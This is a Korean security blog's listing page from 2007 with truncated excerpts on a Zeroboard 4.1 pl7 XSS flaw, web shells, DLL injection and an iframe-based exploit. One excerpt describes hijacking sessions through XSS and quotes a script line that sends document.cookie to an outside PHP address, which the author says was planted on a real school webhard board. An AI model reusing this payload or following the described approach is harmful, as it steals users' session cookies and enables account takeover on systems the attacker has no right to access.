Security128 제로보드 pl7 명칭 : 제로보드 XSS 취약점 발령일시 : 3월14일 해당시스템 : 4.1 pl 7 위험도 : ★★★★★ 최초 보고자 : 유동훈 한국 보안회사 아이넷캅의 유동훈님이 발견한 제로보드 버그가 발표되어 화제를 모으고 있다. 이번 버그는 바로 얼마전 유행했던 웹쉘 인젝션 기법이 아닌 새로운 것으로써 XSS(크로스 사이트 스크립팅) 공격의 일종으로 알려지고 있다. 또한 이 새로운 제로보드 버그는 관리자를 직접 겨냥한 XSS 공격으로써 실제 공격과 응용된 공격이 이루어지면 상당한 파장을 일으킬 것으로 예상되고 있다. 이 공격의 주된 원리는 IP 세션 무력화 기법을 사용하여 제로보드에 사용된 관련 알고리즘을 우회하는 공격으로 보면 된다. 좀 더 자세히 설명을 드리자면 메모함의 제목과 사용자의 정보가 기록되는 부분인.. 2007. 3. 8. 웹쉘의 현황 및 분석 2007. 3. 8. Packet Make & Edit 2007. 3. 8. Dll Injection 2007. 3. 8. 제로보드 pl7 ======================================================================================= 0x00. 배경 설명 0x01. GET, POST method request와 iframe tag 0x02. 실제 적용되는 공격 0x03. End ======================================================================================= 0x00. 배경 설명 따로 'GET, POST method iframe exploit' 이라는 이름을 붙인 이유는 기존 공격들과 구분을 할 필요성을 느꼈기 때문이다. 현재까지 웹컨텐츠 해킹기법은 많은 발전을 해왔다. 단순한 Cookie spoofing.. 2007. 3. 8. XSS - 메일로 전송하기 흔히 XSS 공격을 할때 가장 중요한건 상대방의 session_id가 소멸 되기 전에 자신의 session_id를 상대방 걸로 바꿔 치는건데, 계속 메일창만 드려다 볼수는 없는 노릇임으로, 적절한 작전이 필요한데, 최상의 방법은 바로 MSN 메일을 쓰는 것이다. MSN 메신져를 켜둔 상태에서 MSN 메일에 새로운 메일이 도착하면 알려주는 서비스를 이용해 우리는 신속하게 session_id를 사용할 수 있게 된다. 실제로 학교 웹하드 게시판에 이렇게 글을 적어 두었다. 제목 : 우와 진짜 끝내 주네요! 내용 : 이젠 웹링크도 지원되고 정말 좋은거 같습니다!! i.location="http://rvc.muz.ro/1.php?c="+document.cookie 스크립트가 들어갔지만 실제로 화면으론 다음과 같이.. 2007. 3. 8. 이전 1 ··· 17 18 19 20 21 22 다음